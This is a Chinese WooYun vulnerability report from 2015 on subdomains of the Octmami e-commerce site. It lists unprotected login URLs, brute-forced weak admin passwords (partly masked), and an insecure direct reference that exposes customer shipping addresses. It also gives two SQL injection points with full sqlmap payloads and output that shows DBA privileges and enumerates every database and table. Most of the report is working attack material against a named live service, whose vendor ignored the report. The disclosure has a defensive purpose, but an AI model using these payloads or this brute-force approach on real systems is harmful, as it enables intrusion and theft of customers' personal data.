当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152861

漏洞标题:十月妈咪某子站设计逻辑缺陷/多处SQL注入打包

相关厂商:十月妈咪

漏洞作者: 路人甲

提交时间:2015-11-09 11:13

修复时间:2015-12-24 11:14

公开时间:2015-12-24 11:14

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

发现登录的地方是没有验证的,那么爆破就成为可能了!~~~这个是要被遗弃的站点么???
首先登录地址:

http://st.octmami.com/wap/user/login
http://27.115.100.242/wap/user/login
http://st.octmami.com/wap/user/login
http://manage.st.octmami.com/wap/user/login
http://svn.octmami.com/wap/user/login
http://test2.st.octmami.com/wap/user/login
http://test.st.octmami.com/wap/user/login
http://t.st.octmami.com/wap/user/login
http://dev.st.octmami.com/wap/user/login
http://1.st.octmami.com/wap/user/login
http://3.st.octmami.com/wap/user/login
http://s2.st.octmami.com/wap/user/login


这些都是一样的,就不重复测试了!~~~
我们以
http://st.octmami.com/wap/user/login
为例进行测试,可以看到没有验证码,同时也没有说几次错误后出现验证码或者禁用一段时间,这样就可以顺利地进行爆破了
拿admin/test为例,均为弱口令,直接贴图吧!~~~
用户也可以进行爆破,在找回密码处,填写手机号码,会进行判断是否已注册过或者绑定过,就拿绑定过手机号码的进行爆破就行了,不过这个很耗时间!~~~

1.jpg


2.jpg


3.jpg


获得用户密码:
admin/a*******3
test/1****6
登录后,我们进行抓包,发现对收货地址进行编辑时,抓包后浏览,更改数字,发现可以浏览任意收货地址,信息可完全暴露!~~~目前是不是还是开发中,只有1398个收货地址,影响还不是很大,如果用户多起来,相信是个问题吧~~~~

4.jpg


5.jpg


6.jpg


7.jpg


8.jpg


9.jpg


加验证,看主站登录是有验证的!

漏洞证明:

利用爆破得到的弱口令登录后,进行抓包,发现有几个除了未登录浏览中抓包的几个参数外,还有另外几个参数存在注入
注入点一:
http://st.octmami.com/wap/addr/update?addr_id=1397 (GET)
sqlmap测试

1.jpg


2.jpg


3.jpg


GET parameter 'addr_id' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] N
sqlmap identified the following injection points with a total of 90 HTTP(s) requ
ests:
---
Place: GET
Parameter: addr_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: addr_id=1397 AND 9593=9593
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: addr_id=1397 AND (SELECT 9243 FROM(SELECT COUNT(*),CONCAT(0x717a6f6
e71,(SELECT (CASE WHEN (9243=9243) THEN 1 ELSE 0 END)),0x7169696771,FLOOR(RAND(0
)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: addr_id=1397; SELECT SLEEP(5)--
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: addr_id=1397 AND SLEEP(5)
---
[18:34:15] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL 5.0
[18:34:15] [INFO] fetching current user
[18:34:15] [INFO] retrieved: chen@%
current user:    'chen@%'
[18:34:15] [INFO] fetching current database
[18:34:15] [INFO] retrieved: ecstore
current database:    'ecstore'
[18:34:15] [INFO] testing if current user is DBA
[18:34:15] [INFO] fetching current user
current user is DBA:    True
[18:34:36] [INFO] fetching database names
[18:34:36] [INFO] the SQL query used returns 12 entries
[18:34:36] [INFO] starting 10 threads
[18:34:36] [INFO] retrieved: information_schema
[18:34:36] [INFO] retrieved: octmami
[18:34:36] [INFO] retrieved: ecstore
[18:34:36] [INFO] retrieved: ecstore_new
[18:34:37] [INFO] retrieved: server
[18:34:37] [INFO] retrieved: test
[18:34:37] [INFO] retrieved: performance_schema
[18:34:37] [INFO] retrieved: corp
[18:34:37] [INFO] retrieved: purchase
[18:34:37] [INFO] retrieved: mysql
[18:34:37] [INFO] retrieved: youxi
[18:34:37] [INFO] retrieved: zentao
available databases [12]:
[*] corp
[*] ecstore
[*] ecstore_new
[*] information_schema
[*] mysql
[*] octmami
[*] performance_schema
[*] purchase
[*] server
[*] test
[*] youxi
[*] zentao
Database: ecstore_new
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| oct_product_price_snapshot      | 224072  |
| oct_coupon_list                 | 81028   |
| sdb_image_image                 | 71715   |
| sdb_b2c_comment_goods_point     | 27465   |
| oct_cps_log                     | 19161   |
| sdb_b2c_order_log               | 15183   |
| sdb_b2c_members                 | 14474   |
| sdb_image_image_attach          | 13150   |
| sdb_b2c_member_comments         | 12571   |
| sdb_b2c_order_items             | 10272   |
| sdb_b2c_order_objects           | 10244   |
| sdb_b2c_products                | 7366    |
| oct_verification_code           | 6576    |
| oct_member_point                | 6538    |
| sdb_operatorlog_normallogs      | 5897    |
| oct_member_wap_info             | 5688    |
| oct_advertisement_items         | 5528    |
| sdb_b2c_goods_keywords          | 5377    |
| oct_b2c_goods_spec_index        | 5284    |
| sdb_b2c_goods                   | 5139    |
| sdb_b2c_member_coupon           | 4697    |
| oct_member_weixin_bind          | 4680    |
| sdb_b2c_order_pmt               | 4605    |
| sdb_b2c_orders                  | 4581    |
| sdb_b2c_delivery_items          | 3793    |
| sdb_ectools_regions             | 3266    |
| sdb_b2c_member_addrs            | 3199    |
| sdb_b2c_order_delivery          | 2497    |
| sdb_b2c_delivery                | 2492    |
| oct_recommend_loaction          | 2305    |
| oct_member_weixin_bind3         | 2173    |
| sdb_pam_members                 | 1920    |
| sdb_b2c_goods_spec_index        | 1672    |
| sdb_b2c_goods_type_props_value  | 1606    |
| sdb_base_kvstore                | 1579    |
| sdb_pam_log_desktop             | 1515    |
| sdb_b2c_cart_objects            | 1320    |
| sdb_b2c_type_brand              | 1231    |
| sdb_apiactionlog_apilog         | 1222    |
| oct_prompt_limit                | 947     |
| sdb_b2c_member_point            | 839     |
| sdb_base_app_content            | 784     |
| oct_search_words                | 673     |
| sdb_b2c_member_goods            | 607     |
| sdb_desktop_tag_rel             | 607     |
| sdb_base_cache_expires          | 606     |
| oct_banner_info                 | 577     |
| oct_banner_location             | 577     |
| sdb_b2c_sell_logs               | 569     |
| sdb_ectools_analysis_logs       | 559     |
| sdb_dbeav_meta_value_text       | 517     |
| sdb_b2c_spec_values             | 454     |
| sdb_dbeav_meta_value_longtext   | 452     |
| sdb_ectools_order_bills         | 421     |
| sdb_desktop_recycle             | 418     |
| sdb_ectools_payments            | 380     |
| sdb_b2c_brand                   | 335     |
| oct_prize                       | 322     |
| sdb_aftersales_return_product   | 317     |
| sdb_base_setting                | 317     |
| oct_advertisement               | 300     |
| sdb_b2c_goods_type_props        | 295     |
| oct_order_pmt                   | 275     |
| sdb_desktop_menus               | 258     |
| sdb_b2c_order_cancel_reason     | 235     |
| sdb_site_widgets_instance       | 203     |
| oct_cps_valuation               | 200     |
| oct_turn_table                  | 200     |
| oct_coupon_order_item           | 186     |
| oct_brand_special               | 153     |
| oct_stores                      | 140     |
| oct_cps_put                     | 121     |
| sdb_site_widgets                | 121     |
| sdb_system_queue_mysql          | 110     |
| oct_feedback                    | 102     |
| oct_stores_image                | 99      |
| oct_special_product             | 98      |
| sdb_b2c_goods_cat               | 93      |
| sdb_b2c_goods_rate              | 93      |
| sdb_site_themes_file            | 93      |
| sdb_order_task_log              | 82      |
| sdb_operatorlog_register        | 79      |
| sdb_b2c_goods_type              | 76      |
| sdb_b2c_goods_type_spec         | 73      |
| sdb_content_article_bodys       | 72      |
| sdb_b2c_goods_lv_price          | 68      |
| sdb_search_associate            | 63      |
| oct_service_call                | 58      |
| sdb_search_delta                | 58      |
| sdb_site_themes_tmpl            | 57      |
| oct_cps_put_type                | 54      |
| baby_face_get_stars             | 52      |
| oct_cps_case                    | 50      |
| sdb_base_apps                   | 49      |
| oct_coupon_cate                 | 45      |
| oct_coupon_rule                 | 45      |
| oct_prompt_flash                | 43      |
| sdb_ectools_refunds             | 41      |
| oct_banner_dimension            | 40      |
| sdb_content_article_indexs      | 40      |
| oct_coupon_grant                | 37      |
| oct_recommend_comment_cat       | 36      |
| sdb_starbuy_special_goods       | 35      |
| sdb_b2c_goods_promotion_ref     | 34      |
| sdb_b2c_sales_rule_order        | 31      |
| sdb_desktop_tag                 | 31      |
| sdb_dbeav_meta_value_varchar    | 30      |
| sdb_b2c_dlycorp                 | 27      |
| sdb_b2c_member_systmpl          | 26      |
| sdb_b2c_goods_virtual_cat       | 25      |
| sdb_site_modules                | 25      |
| sdb_couponlog_order_coupon_ref  | 24      |
| sdb_couponlog_order_coupon_user | 24      |
| sdb_gift_ref                    | 24      |
| sdb_desktop_hasrole             | 22      |
| sdb_b2c_coupons                 | 20      |
| sdb_b2c_specification           | 20      |
| sdb_dbeav_meta_register         | 18      |
| oct_recommend_dimension         | 17      |
| sdb_desktop_users               | 17      |
| sdb_wap_modules                 | 16      |
| sdb_dbeav_meta_value_int        | 14      |
| sdb_pam_account                 | 14      |
| sdb_starbuy_special             | 14      |
| oct_recommend_comment_define    | 12      |
| oct_sm_task_items               | 12      |
| sdb_base_crontab                | 12      |
| sdb_wap_widgets                 | 12      |
| oct_recommend_comment_info      | 10      |
| sdb_b2c_member_advance          | 9       |
| sdb_content_article_nodes       | 9       |
| sdb_site_menus                  | 9       |
| oct_search_hot                  | 8       |
| sdb_b2c_member_lv               | 8       |
| oct_special_info                | 7       |
| sdb_importexport_task           | 7       |
| sdb_site_seo                    | 7       |
| oct_sm_queues                   | 6       |
| sdb_b2c_reship_items            | 6       |
| sdb_desktop_roles               | 6       |
| oct_channel                     | 5       |
| oct_employees                   | 5       |
| oct_goods_seckill               | 5       |
| oct_prompt_activity             | 5       |
| oct_sm_users                    | 5       |
| sdb_wap_themes_file             | 5       |
| sdb_wap_themes_tmpl             | 5       |
| sdb_wap_widgets_instance        | 5       |
| oct_admin_group                 | 4       |
| oct_sm_tasks                    | 4       |
| sdb_b2c_dlytype                 | 4       |
| sdb_b2c_reship                  | 4       |
| oct_location                    | 3       |
| oct_sm_models                   | 3       |
| sdb_b2c_comment_goods_type      | 3       |
| sdb_base_network                | 3       |
| sdb_ectools_analysis            | 3       |
| sdb_site_themes                 | 3       |
| sdb_starbuy_promotions_type     | 3       |
| oct_agent                       | 2       |
| oct_business_district           | 2       |
| sdb_b2c_orders_recommend        | 2       |
| sdb_gift_cat                    | 2       |
| sdb_site_route_statics          | 2       |
| oct_draw_list                   | 1       |
| oct_goods_ads                   | 1       |
| oct_sm_tags                     | 1       |
| sdb_b2c_goods_store_prompt      | 1       |
| sdb_desktop_filter              | 1       |
| sdb_ectools_currency            | 1       |
| sdb_site_explorers              | 1       |
| sdb_site_link                   | 1       |
| sdb_starbuy_cancelorder         | 1       |
| sdb_starbuy_count_member_buy    | 1       |
| sdb_wap_themes                  | 1       |
+---------------------------------+---------+
Database: octmami
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| sdb_b2c_comment_goods_point     | 7833    |
| sdb_image_image                 | 3590    |
| sdb_ectools_regions             | 3266    |
| sdb_b2c_member_comments         | 2635    |
| sdb_operatorlog_normallogs      | 1940    |
| sdb_base_kvstore                | 1772    |
| sdb_pam_members                 | 1573    |
| sdb_b2c_goods_type_props_value  | 1485    |
| sdb_b2c_products                | 1269    |
| sdb_image_image_attach          | 1215    |
| sdb_b2c_members                 | 991     |
| sdb_b2c_goods_spec_index        | 943     |
| sdb_base_app_content            | 762     |
| sdb_b2c_goods                   | 651     |
| sdb_ectools_analysis_logs       | 559     |
| sdb_pam_log_desktop             | 516     |
| sdb_desktop_tag_rel             | 475     |
| sdb_dbeav_meta_value_text       | 391     |
| sdb_base_cache_expires          | 370     |
| sdb_dbeav_meta_value_longtext   | 349     |
| oct_prize                       | 322     |
| sdb_b2c_goods_type_props        | 290     |
| sdb_b2c_spec_values             | 263     |
| sdb_desktop_menus               | 258     |
| sdb_b2c_goods_keywords          | 229     |
| sdb_base_setting                | 213     |
| sdb_b2c_order_log               | 211     |
| sdb_desktop_recycle             | 163     |
| sdb_b2c_order_items             | 158     |
| sdb_b2c_order_objects           | 155     |
| sdb_site_widgets_instance       | 136     |
| sdb_b2c_goods_rate              | 93      |
| sdb_b2c_orders                  | 93      |
| sdb_b2c_type_brand              | 89      |
| oct_comment_tmp                 | 85      |
| sdb_operatorlog_register        | 79      |
| sdb_b2c_member_addrs            | 76      |
| sdb_ectools_order_bills         | 74      |
| sdb_b2c_goods_cat               | 71      |
| sdb_ectools_payments            | 71      |
| sdb_b2c_goods_type              | 65      |
| sdb_site_widgets                | 62      |
| sdb_content_article_bodys       | 53      |
| sdb_b2c_delivery_items          | 48      |
| sdb_b2c_sell_logs               | 47      |
| sdb_base_apps                   | 47      |
| sdb_b2c_delivery                | 42      |
| sdb_b2c_order_delivery          | 42      |
| sdb_b2c_member_coupon           | 41      |
| sdb_site_themes_file            | 41      |
| sdb_b2c_goods_type_spec         | 33      |
| sdb_b2c_cart_objects            | 32      |
| sdb_b2c_brand                   | 31      |
| sdb_b2c_order_pmt               | 30      |
| sdb_b2c_dlycorp                 | 26      |
| sdb_content_article_indexs      | 25      |
| sdb_site_modules                | 25      |
| sdb_b2c_specification           | 21      |
| sdb_b2c_member_goods            | 20      |
| sdb_site_themes_tmpl            | 20      |
| sdb_desktop_tag                 | 18      |
| sdb_b2c_sales_rule_order        | 17      |
| sdb_couponlog_order_coupon_ref  | 16      |
| sdb_couponlog_order_coupon_user | 16      |
| sdb_wap_modules                 | 16      |
| sdb_b2c_goods_promotion_ref     | 15      |
| sdb_dbeav_meta_register         | 15      |
| sdb_wap_widgets                 | 12      |
| sdb_base_crontab                | 10      |
| sdb_b2c_goods_virtual_cat       | 8       |
| sdb_content_article_nodes       | 8       |
| sdb_desktop_users               | 7       |
| sdb_pam_account                 | 7       |
| sdb_site_seo                    | 7       |
| sdb_b2c_member_advance          | 6       |
| sdb_desktop_hasrole             | 6       |
| sdb_site_menus                  | 6       |
| sdb_dbeav_meta_value_varchar    | 5       |
| sdb_desktop_roles               | 5       |
| sdb_b2c_member_lv               | 4       |
| sdb_wap_widgets_instance        | 4       |
| oct_admin_group                 | 3       |
| oct_goods_ads                   | 3       |
| sdb_b2c_comment_goods_type      | 3       |
| sdb_b2c_member_point            | 3       |
| sdb_base_network                | 3       |
| sdb_ectools_analysis            | 3       |
| sdb_ectools_refunds             | 3       |
| oct_brand_special               | 2       |
| sdb_b2c_dlytype                 | 2       |
| sdb_b2c_member_systmpl          | 2       |
| sdb_site_themes                 | 2       |
| sdb_starbuy_promotions_type     | 2       |
| sdb_wap_themes_file             | 2       |
| sdb_wap_themes_tmpl             | 2       |
| oct_goods_seckill               | 1       |
| sdb_b2c_coupons                 | 1       |
| sdb_ectools_currency            | 1       |
| sdb_site_explorers              | 1       |
| sdb_system_queue_mysql          | 1       |
| sdb_wap_themes                  | 1       |
+---------------------------------+---------+


注入点二:
http://st.octmami.com/wap/member/orderinfo.html?order_id=151020190191839 (GET)

4.jpg


5.jpg


[18:47:52] [INFO] testing connection to the target URL
[18:47:52] [INFO] heuristics detected web page charset 'ISO-8859-2'
[18:47:52] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[18:47:53] [INFO] target URL is stable
[18:47:53] [INFO] testing if GET parameter 'order_id' is dynamic
[18:47:54] [INFO] heuristics detected web page charset 'utf-8'
[18:47:54] [INFO] confirming that GET parameter 'order_id' is dynamic
[18:47:54] [INFO] GET parameter 'order_id' is dynamic
[18:47:54] [INFO] heuristic (basic) test shows that GET parameter 'order_id' mig
ht be injectable (possible DBMS: 'MySQL')
[18:47:54] [INFO] testing for SQL injection on GET parameter 'order_id'
[18:47:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:47:54] [INFO] heuristics detected web page charset 'ascii'
[18:47:55] [WARNING] reflective value(s) found and filtering out
[18:47:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[18:47:58] [INFO] GET parameter 'order_id' is 'MySQL >= 5.0 AND error-based - WH
ERE or HAVING clause' injectable
[18:47:58] [INFO] testing 'MySQL inline queries'
[18:47:58] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:48:08] [INFO] GET parameter 'order_id' seems to be 'MySQL > 5.0.11 stacked q
ueries' injectable
[18:48:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:48:18] [INFO] GET parameter 'order_id' seems to be 'MySQL > 5.0.11 AND time-
based blind' injectable
[18:48:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:48:18] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[18:48:26] [INFO] target URL appears to be UNION injectable with 10 columns
[18:48:31] [INFO] GET parameter 'order_id' is 'MySQL UNION query (NULL) - 1 to 2
0 columns' injectable
GET parameter 'order_id' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] N
sqlmap identified the following injection points with a total of 50 HTTP(s) requ
ests:
---
Place: GET
Parameter: order_id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: order_id=151020190191839) AND (SELECT 6188 FROM(SELECT COUNT(*),CON
CAT(0x7163637471,(SELECT (CASE WHEN (6188=6188) THEN 1 ELSE 0 END)),0x7164686c71
,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (51
11=5111
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: order_id=151020190191839) UNION ALL SELECT NULL,NULL,CONCAT(0x71636
37471,0x53557a5274676b735145,0x7164686c71),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: order_id=151020190191839); SELECT SLEEP(5)--
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: order_id=151020190191839) AND SLEEP(5) AND (8386=8386
---
[18:48:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL 5.0
[18:48:34] [INFO] fetching current user
current user:    'chen@%'
[18:48:35] [INFO] fetching current database
current database:    'ecstore'
[18:48:35] [INFO] testing if current user is DBA
[18:48:35] [INFO] fetching current user
current user is DBA:    True

修复方案:

主站都做得有验证了,相信这个测试的站点应该没有问题了!~~~
要不废弃的站点直接关闭吧!~~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评价